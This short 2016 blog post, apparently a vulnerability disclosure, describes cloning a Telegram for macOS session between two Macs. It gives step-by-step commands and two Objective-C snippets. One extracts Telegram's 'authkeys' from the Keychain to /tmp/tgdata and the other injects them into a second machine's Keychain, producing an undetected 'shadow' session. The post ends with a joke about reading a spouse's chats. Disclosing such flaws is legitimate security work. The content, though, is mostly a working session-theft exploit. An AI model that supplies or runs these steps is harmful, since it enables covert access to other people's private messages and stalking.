Malicious ‘shadow’ sessions in Telegram
1 min readAug 11, 2016
Actions on Macbook A(lice):
- Extract Telegram data from the Keychain:
a) run ./tg_telegram_get
It writes Telegram keychain data to file /tmp/tgdata
OR
b) compile ObjectiveC code and run it.
#import <Foundation/Foundation.h>
#import “SSKeychain.h”int main(int argc, const char * argv[]) {
// get
NSData *d = [SSKeychain passwordDataForService:@”Telegram” account:@”authkeys”];
[d writeToFile:@”/tmp/tgdata” atomically:true];
return 0;
}
You will be prompted to allow the access to the Keychain, but you are NOT prompted for any password to do it. lol
2) Copy /tmp/tgdata to another device (USB?)
Actions on Macbook B(ob)
0) Copy tgdata from USB to /tmp/tgdata
1) We need to set Telegram data to the keychain:
a) Just run binary file ./tg_telegram_set
b) or compile it:
#import <Foundation/Foundation.h>
#import “SSKeychain.h”int main(int argc, const char * argv[]) {
// set
NSData *fileData = [[NSFileManager defaultManager] contentsAtPath:@”/tmp/tgdata”];
[SSKeychain setPasswordData:fileData forService:@”Telegram” account:@”authkeys”];
return 0;
}
2) Start Telegram.app
3) HOLY SHI~ Where is a device detection? Is this the most secured messenger ever made?
Is this a bug? A feature? There SHOULD be the device check on every run.
Up to you.
P.S. Please, do not use it to read your wife’s chats. Just trust her :)
